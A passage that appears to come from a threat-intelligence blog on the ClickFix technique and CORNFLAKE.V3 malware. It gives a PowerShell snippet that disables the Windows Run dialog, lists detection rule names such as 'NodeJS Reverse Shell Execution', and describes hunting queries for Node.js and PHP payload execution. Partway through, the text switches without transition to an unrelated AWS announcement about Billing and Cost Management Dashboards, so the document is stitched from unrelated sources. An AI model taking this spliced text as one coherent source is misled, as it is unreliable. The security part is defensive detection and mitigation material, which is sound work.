To mitigate malware execution through ClickFix, organizations should disable the Windows Run dialog box where possible. Regular simulation exercises are crucial to counter this and other social engineering tactics. Furthermore, robust logging and monitoring systems are essential for detecting the execution of subsequent payloads, such as those associated with CORNFLAKE.V3.
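Where disabling the Run dialog is appropriate, it can be enforced centrally through the “Remove Run menu from Start Menu” Group Policy setting, or per user via the corresponding Explorer policy value. A sketch of the registry form is shown below; test before broad rollout, since this also blocks legitimate Win+R usage:
# Disable the Windows Run dialog for the current user (equivalent to the
# "Remove Run menu from Start Menu" Group Policy setting).
$policyKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
if (-not (Test-Path $policyKey)) {
    New-Item -Path $policyKey -Force | Out-Null
}
Set-ItemProperty -Path $policyKey -Name 'NoRun' -Value 1 -Type DWord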
Acknowledgements
Special thanks to Diana Ion, Yash Gupta, Rufus Brown, Mike Hunhoff, Genwei Jiang, Mon Liclican, Preston Lewis, Steve Sedotto, Elvis Miezitis and Rommel Joven for their valuable contributions to this blog post.
Detection Through Google Security Operations
For detailed guidance on hunting for this activity using the following queries, and for a forum to engage with our security experts, please visit our companion post on the Google Cloud Community blog.
Mandiant has made the relevant rules available in the Google SecOps Mandiant Frontline Threats curated detections rule set. The activity discussed in the blog post is detected in Google SecOps under the rule names:
Powershell Executing NodeJS
Powershell Writing To Appdata
Suspicious Clipboard Interaction
NodeJS Reverse Shell Execution
Download to the Windows Public User Directory via PowerShell
Run Utility Spawning Suspicious Process
WSH Startup Folder LNK Creation
Trycloudflare Tunnel Network Connections
SecOps Hunting Queries
The following UDM queries can be used to identify potential compromises within your environment.
Execution of CORNFLAKE.V3 — Node.js
Search for potential compromise activity where PowerShell is used to launch node.exe from an %AppData% path with the -e argument, indicating direct execution of a malicious JavaScript string.
Search for compromise activity where PowerShell executes php.exe from an %AppData% path. This variant is characterized by the use of the -d argument, execution of a PHP script without a .php file extension, and passing the argument 1 to the PHP interpreter, indicating covert execution of malicious PHP code.
Search for suspicious process activity where cmd.exe or powershell.exe is spawned as a child process of node.exe or php.exe when those executables are located in %AppData%.
Search for unusual network connections initiated by powershell.exe or mshta.exe to legitimate Node.js (nodejs.org) or PHP (windows.php.net) infrastructure domains.
Today, AWS announces the general availability of AWS Billing and Cost Management Dashboards, a new feature within AWS Billing and Cost Management that helps you visualize and analyze your AWS spending in one consolidated view. This feature enables you to create customized dashboards that combine data from AWS Cost Explorer and Savings Plans and Reserved Instance coverage and utilization reports. With Billing and Cost Management Dashboards, you can quickly understand your AWS cost patterns and make informed financial decisions for your organization.
Billing and Cost Management Dashboards allows you to create and customize widgets using various widget types, including cost widgets, usage widgets, Savings Plans utilization and coverage widgets, and Reserved Instances utilization and coverage widgets. Each widget can be configured with different visualizations, such as line charts, bar charts, stacked bar charts, or tables, and you can customize dashboard layouts by adjusting widget sizes and positions. You can share these dashboards across accounts within or outside your organization, enabling FinOps teams to establish standardized cost reporting practices throughout their organization.
AWS Billing and Cost Management Dashboards is available at no additional cost in all AWS commercial Regions, excluding AWS China Regions. To get started with AWS Billing and Cost Management Dashboards, visit the AWS Billing and Cost Management console and select “Dashboards” from the left navigation menu. For more information, see the AWS Billing and Cost Management Dashboards user guide or blog.